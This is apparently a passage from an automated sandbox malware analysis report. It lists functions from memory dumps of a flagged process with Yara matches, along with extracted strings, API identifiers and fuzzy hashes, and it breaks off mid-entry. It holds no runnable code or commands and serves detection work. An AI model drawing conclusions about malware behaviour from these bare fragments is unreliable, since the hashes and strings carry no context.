                                                      Function 01ADF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 01B2031E
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01B202BD
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01B202E7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: ef1bf85b57f2f4e02b4d29c58aaaa0d225b32f351932718a1cd0c3c5de0a76a7
                                                      • Instruction ID: 66832531882546d511c605f4379ba2bba6e76b9085007612cccaec6754d4ba57
                                                      • Opcode Fuzzy Hash: ef1bf85b57f2f4e02b4d29c58aaaa0d225b32f351932718a1cd0c3c5de0a76a7
                                                      • Instruction Fuzzy Hash: AFE19E30604B419FD729DF28C884B6BBBE0FB89314F140A5DF5A68B2E1D774D949CB42
                                                      Function 01AEBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 01B27BAC
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01B27B7F
                                                      • RTL: Resource at %p, xrefs: 01B27B8E
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: e113c7e07ab97d4011c3a607d19b29e7349a955a26d6f0ee23bccdfc35482aee
                                                      • Instruction ID: f8e1e2c88924013f57c77dadda48f5fd1bdb6e432652198ff20c1bd1e6af53dc
                                                      • Opcode Fuzzy Hash: e113c7e07ab97d4011c3a607d19b29e7349a955a26d6f0ee23bccdfc35482aee
                                                      • Instruction Fuzzy Hash: CB4103317007029FDB29DF29CC58B6AB7E5EF98710F100A5DFA5AD7290DB31E8058BA1
                                                      Function 01AEB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B2728C
                                                      Strings
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01B27294
                                                      • RTL: Re-Waiting, xrefs: 01B272C1
                                                      • RTL: Resource at %p, xrefs: 01B272A3
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: 6e320724c53cbb3c83d82a8fc6c9b6262194c901de357e5740c2af16ace6e6ae
                                                      • Instruction ID: 4b517cc34b4d0c157b0a8e9118c9d441ae567172410567587aa1eb17dc0033bd
                                                      • Opcode Fuzzy Hash: 6e320724c53cbb3c83d82a8fc6c9b6262194c901de357e5740c2af16ace6e6ae
                                                      • Instruction Fuzzy Hash: 19412031700217ABCB29DE29CC45B66B7E1FBA6710F100658F959EB280DB30E85687E5
                                                      Function 01B62300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$]:%u
                                                      • API String ID: 48624451-3050659472
                                                      • Opcode ID: d3b25d66010c6bcd4ec38b171c34574ff6ab182561d2cb00abaa3b1204761af0
                                                      • Instruction ID: f1e3c38cd9d662e13e5094cc781fbde499de33343363a02214a47ad82dca3ef2
                                                      • Opcode Fuzzy Hash: d3b25d66010c6bcd4ec38b171c34574ff6ab182561d2cb00abaa3b1204761af0
                                                      • Instruction Fuzzy Hash: 2F318872A002199FDB25DE2DCC80BEE77FCFF54650F4405DAE949E3140EB349A448B60
                                                      Function 01AF7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: a806f2c4079d80ec5596c5415f0498a2988c6b138e645b6a1d3168d6d73165de
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: A491A071E0021A9AEB24DFEDC880ABEBBB5AF44720F58461EFB55E72C0D7349941CB51
                                                      Function 01AB9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: ea342207214798dd2c186a71e2190632107a91178ad59943f3aab0a5f1089aec
                                                      • Instruction ID: 617c126d1eddb679879334fdc38cea4ce390121ed3ae0ae086de1557373ee174
                                                      • Opcode Fuzzy Hash: ea342207214798dd2c186a71e2190632107a91178ad59943f3aab0a5f1089aec
                                                      • Instruction Fuzzy Hash: 07811CB1D002699BDB35CB54CD45BEEB7B8AF08754F1541DAEA19B7280D7305E84CFA0
                                                      Function 01B3CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 01B3CFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4Qw@4Qw
                                                      • API String ID: 4062629308-2383119779
                                                      • Opcode ID: e6930587c13c24a78fba0df22ce40a5eaa7cbd6281318b588a7238905b03f661
                                                      • Instruction ID: 1e90611faa86d7b1d99cacde3c89fc695ba869bedbbdc3384d3f2749d8c24654
                                                      • Opcode Fuzzy Hash: e6930587c13c24a78fba0df22ce40a5eaa7cbd6281318b588a7238905b03f661
                                                      • Instruction Fuzzy Hash: EF41BD71904215DFCB259FE9C940AAEFBB8FF98B00F4041AEE905EB264D734D804CB60

                                                      Executed Functions

                                                      Function 0599685C Relevance: 40.5, Strings: 32, Instructions: 458COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $!F$$W%'$%'$,$-9$0$0$1$4$5u$5u$8<$;$;N$=w$B0$DH$P`$Q$Q$V$Z~$_p$`e$b$cm$m$o$rR$ $:
                                                      • API String ID: 0-4271926158
                                                      • Opcode ID: 488b702d4466b1388d986b8d55ce956e872d19b7188e710194d7d4f696229230
                                                      • Instruction ID: eec9fc94dc1e6c99df7118ba6892768eb7394df82214a72a9c428dbc88554331
                                                      • Opcode Fuzzy Hash: 488b702d4466b1388d986b8d55ce956e872d19b7188e710194d7d4f696229230
                                                      • Instruction Fuzzy Hash: 2A32B1B0D05268CBEF28CF99C994BEDBBB2FB44308F10859ED04A6B291D7755A85CF50
                                                      Function 059A4417 Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6$O$S$\$s
                                                      • API String ID: 0-3854637164
                                                      • Opcode ID: 928da914ebc6ff214dd207d7adc4155db9c060ef3a0aaca39bffdeb5113866dd
                                                      • Instruction ID: 6ebda6bdac0684844993d453ec9cefcd76ed7ec22c8313c0e5c999b66c88a799
                                                      • Opcode Fuzzy Hash: 928da914ebc6ff214dd207d7adc4155db9c060ef3a0aaca39bffdeb5113866dd
                                                      • Instruction Fuzzy Hash: BA51A672905218AAEF10DFA4DD89EEEB378EF84314F148299ED1C57100E7B16A548BE1
                                                      Function 059B2AD7 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: O#
                                                      • API String ID: 0-2489266247
                                                      • Opcode ID: a33ff6b8ce4c8b72a64bc8c398ee45de2b821f93fca62f28962582326cac80cf
                                                      • Instruction ID: 5074cce8abaec5f518aae67c1fc77a87e78cfa6a6ce2ee559a0b5c4d97d3a882
                                                      • Opcode Fuzzy Hash: a33ff6b8ce4c8b72a64bc8c398ee45de2b821f93fca62f28962582326cac80cf
                                                      • Instruction Fuzzy Hash: 731124B6D0121DAFDB40DFA9D8419EFB7FDEF48200F14456AE919E7240E771AA048BA1
                                                      Function 059B1707 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 1
                                                      • API String ID: 0-501262851
                                                      • Opcode ID: 0b72d30b9664b95636b068530a56bcb7a7eb4d54bde8eb534e68f2f5cc798f1a
                                                      • Instruction ID: e81ac5ed468ef14e9da68a9d433a9a9af10d7ca03cdc8a8773533176f449ba89
                                                      • Opcode Fuzzy Hash: 0b72d30b9664b95636b068530a56bcb7a7eb4d54bde8eb534e68f2f5cc798f1a
                                                      • Instruction Fuzzy Hash: 6701DBB2D01218AF9B44EFE8D9409EEBBF8AB58200F14456EE505F3240E7715B048BA1
                                                      Function 059970B4 Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5u
                                                      • API String ID: 0-3280426490
                                                      • Opcode ID: e595a0bf63e81574ad385e5dcff38a3c2b14a6d210a60f45ec770eadf6a38b6d
                                                      • Instruction ID: 3ff3c8d89925220924724ab814a003d0b8c1f17ce4c87738eb112259c88a9a1e
                                                      • Opcode Fuzzy Hash: e595a0bf63e81574ad385e5dcff38a3c2b14a6d210a60f45ec770eadf6a38b6d
                                                      • Instruction Fuzzy Hash: 20F0F8B5E00119AFCF18DFA8CD949EEBFB5EB4A301F104199E416B6341DB746A51CF40
                                                      Function 0599045F Relevance: .1, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b209ee08b8d97d202ea7b95455b3dc75f2a7a2f0cfbb4cba8462f7b9365a7edc
                                                      • Instruction ID: 47faf8c788a846c8bb311b8f5b9b6abf4ac506aa5c518e64683aa3f53218c2f0
                                                      • Opcode Fuzzy Hash: b209ee08b8d97d202ea7b95455b3dc75f2a7a2f0cfbb4cba8462f7b9365a7edc
                                                      • Instruction Fuzzy Hash: 5C410CB1D11229AFDB04CF99DC85AEEBFBCEF49710F10415AF918E6244E7B19641CBA0
                                                      Function 059B4DA7 Relevance: .1, Instructions: 85COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 39cd607726e6c426a60c4c9107f97c7e6a3420a2b29aa673c4b9a22b5847f512
                                                      • Instruction ID: 9fb3e51d6b31e6f75dec3be764f49ef65b83933ae6619c82f4c9f817c6b2ee06
                                                      • Opcode Fuzzy Hash: 39cd607726e6c426a60c4c9107f97c7e6a3420a2b29aa673c4b9a22b5847f512
                                                      • Instruction Fuzzy Hash: 613118B5A10208AFDB14DF98D980EEFB7B9EF89300F108219F958A7340D770B911CBA1
                                                      Function 059B5707 Relevance: .1, Instructions: 77COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 24738b3f785fde34097102ca71d43b80c37fa97d0ee65a5854005767d32b7b02
                                                      • Instruction ID: a3d668ba572ae8513202afb99153711ca78319cf78730edd2499501d96f41f18
                                                      • Opcode Fuzzy Hash: 24738b3f785fde34097102ca71d43b80c37fa97d0ee65a5854005767d32b7b02
                                                      • Instruction Fuzzy Hash: 4621F4B5A10208AFEB14EF98DD85EEFB7B9EF89310F044509F95897280D770B911CBA1
                                                      Function 059A4257 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a0e2739ca3550f826d5e141a3f497e2f922a9d8f3e2bbbf3222ed9d02cbba63a
                                                      • Instruction ID: f35661156ec8f2a7da8c79d31da879dd4145157c0af339b30b8e4b61991aa151
                                                      • Opcode Fuzzy Hash: a0e2739ca3550f826d5e141a3f497e2f922a9d8f3e2bbbf3222ed9d02cbba63a
                                                      • Instruction Fuzzy Hash: 7C1170B23803057BF720AA558D86FAB379DDBC4F54F284015FF08AA2C5E6E5F81186B4
                                                      Function 059905AD Relevance: .1, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 13cc2ee55c38300a5f76374931da22431026d1a7e07f5837614e398f50bb4fe3
                                                      • Instruction ID: f47de8c249f1ae62ce1f42184f1cbab5d323f087bc1b898fe5e69888304c05f1
                                                      • Opcode Fuzzy Hash: 13cc2ee55c38300a5f76374931da22431026d1a7e07f5837614e398f50bb4fe3
                                                      • Instruction Fuzzy Hash: AB1187B2604115ABDB14CE5DDC85FEAB7ACFF85224F100116E91C9B241E772E551C7A1
                                                      Function 059B1797 Relevance: .1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 820ece6ad8384a06fb44f66adcc15b86ccf2b08fda074ee65b3e68cc00fda280
                                                      • Instruction ID: e6af2afbb9708bb00eb5a472e331c6aab3d88ab95073037ecf917224afe47a12
                                                      • Opcode Fuzzy Hash: 820ece6ad8384a06fb44f66adcc15b86ccf2b08fda074ee65b3e68cc00fda280
                                                      • Instruction Fuzzy Hash: 2011FEB6D01218AF9B00DFA9D8409EFB7F9FF88210F04415AE919E7240E7715A04CBE0
                                                      Function 059B4BB7 Relevance: .1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0798bdf14b2fb3a584b9c899182cebd5fc4ce6b551de1b8982a3c8b97a7fe01e
                                                      • Instruction ID: 2fcd2a727c5beffb2ab7f3da79b9deeb9a7d364462f35a3fcf14f3e2161c4aa6
                                                      • Opcode Fuzzy Hash: 0798bdf14b2fb3a584b9c899182cebd5fc4ce6b551de1b8982a3c8b97a7fe01e
                                                      • Instruction Fuzzy Hash: 441137B5A01358ABEB20EB68CC45EFA77ADEBC5700F044509F95997280D6707901CBA1
                                                      Function 059B4A37 Relevance: .1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: adbf88d96c35524180afd26adb7140100c28aabd431af0b4033c9e86e27f4e41
                                                      • Instruction ID: aa1da81e6d1943c533942f920b0a8126cf0d26a8fcca4dd0040123453643bd9f
                                                      • Opcode Fuzzy Hash: adbf88d96c35524180afd26adb7140100c28aabd431af0b4033c9e86e27f4e41
                                                      • Instruction Fuzzy Hash: C41137B5A11248BBEB24EB54CD45FFB77ADEB85700F004509F9489B280D7B07901C7A1
                                                      Function 059B5A67 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2f6ac9e8aaa5c724821357bd286b7ac54767ad4f1283a8855f4653ad494c20a0
                                                      • Instruction ID: c2d1ef717d38b88b4e9768679ac668f0868dbf92c54ad8259203e8ec59fa41b0
                                                      • Opcode Fuzzy Hash: 2f6ac9e8aaa5c724821357bd286b7ac54767ad4f1283a8855f4653ad494c20a0
                                                      • Instruction Fuzzy Hash: E701C0B2600248BBCB54DE89DC80EEB77AEAFCD754F008108BA09A7240D630FC518BA4
                                                      Function 059B4CB7 Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7a10190e342607dbba4fa58d3b266c24834cf6732d254b15f265296bf5db73df
                                                      • Instruction ID: cf96fade5a5e69e1cdbcaf65b0826d7a53d58e2f2dc4aad3b3d158e2f586232d
                                                      • Opcode Fuzzy Hash: 7a10190e342607dbba4fa58d3b266c24834cf6732d254b15f265296bf5db73df
                                                      • Instruction Fuzzy Hash: 65F01CB63102487FDB10EF99DC41EAB77ADEFC9710F004409BD5897241D670B9118BB1
                                                      Function 059B5987 Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a6ff5ca3a5dbbea5a6c0b0ac1db6e56cf909ba38468f7b4cb112d0a282205096
                                                      • Instruction ID: 0555aa542f5e09725ebca43020ada1f2557d17636b191b15ddf8ffd380c2ba23
                                                      • Opcode Fuzzy Hash: a6ff5ca3a5dbbea5a6c0b0ac1db6e56cf909ba38468f7b4cb112d0a282205096
                                                      • Instruction Fuzzy Hash: 9BE0EDB56002097FDA14EE59DC45EEB77ADDFCA710F004419F948A7241D671BD1087B5
                                                      Function 059A4377 Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a7a89bf0b7ff1966d1fd272edeaf3f836e071a560e24df1aff220d124b7741e0
                                                      • Instruction ID: 9f0735ad5c618bd1e19b15548c004534cf118dcaf468ee252a9a68118f7767c0
                                                      • Opcode Fuzzy Hash: a7a89bf0b7ff1966d1fd272edeaf3f836e071a560e24df1aff220d124b7741e0
                                                      • Instruction Fuzzy Hash: 38F08271815208EBDF14CF64D941BDDBBB9EB44320F1047ADE8289B280E63597508791
                                                      Function 059B77F7 Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bb43494759f38a9e015ab9789b8e2b60864337fac70934a4ad7678cc10e2c41f
                                                      • Instruction ID: 5fd4c2b7d0fe8f133523ddedb3a3251851b44b7f3f31539dd6470721f236a12a
                                                      • Opcode Fuzzy Hash: bb43494759f38a9e015ab9789b8e2b60864337fac70934a4ad7678cc10e2c41f
                                                      • Instruction Fuzzy Hash: 32E04F72B0021427F62057C99D49FD7B76DDFC5E61F090165FE089B340E5A5B90186F5
                                                      Function 059B5677 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7fea8813780153429a3e2bc9ce62912ee225e97507eed709cacbc900be663fb2
                                                      • Instruction ID: e0058272f51e006fb99bc7c8443a9fbbf5e7e8c46607ddbfc94686c3d66fa083
                                                      • Opcode Fuzzy Hash: 7fea8813780153429a3e2bc9ce62912ee225e97507eed709cacbc900be663fb2
                                                      • Instruction Fuzzy Hash: F4E086753002447BD620FA59CC00FD7776DDFC6715F104055FA4867541CA717901C7B1
                                                      Function 059A43CE Relevance: .0, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e864b87a8289c21135126038acdbd4c7b369fde05e8b9f1e9281badc80b64feb
                                                      • Instruction ID: 0dbbf551422593232e6558793b1244b850bb0c44ed5c10892011aaf300ceb884
                                                      • Opcode Fuzzy Hash: e864b87a8289c21135126038acdbd4c7b369fde05e8b9f1e9281badc80b64feb
                                                      • Instruction Fuzzy Hash: 0CE09272909108ABEF04CB60D980BEDBB69EB00210F144BA9E41897240DA3687509651

                                                      Non-executed Functions

                                                      Function 059A0109 Relevance: 51.4, Strings: 41, Instructions: 176COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                      • API String ID: 0-3248090998
                                                      • Opcode ID: 47845c7b3d946c6d27b4f6c5100944e6f0f4f56716751c51208d680fb87b8760
                                                      • Instruction ID: 7d479483143a8c1b5b3db838e8670dde59b7ed5404490ef59ec5d5dc474d9959
                                                      • Opcode Fuzzy Hash: 47845c7b3d946c6d27b4f6c5100944e6f0f4f56716751c51208d680fb87b8760
                                                      • Instruction Fuzzy Hash: 2E910FF18052A88ACB118F55A5643DFBF71BB85304F1581E9C6AA7B203C3BE4E46DF90
                                                      Function 05996897 Relevance: 35.1, Strings: 28, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
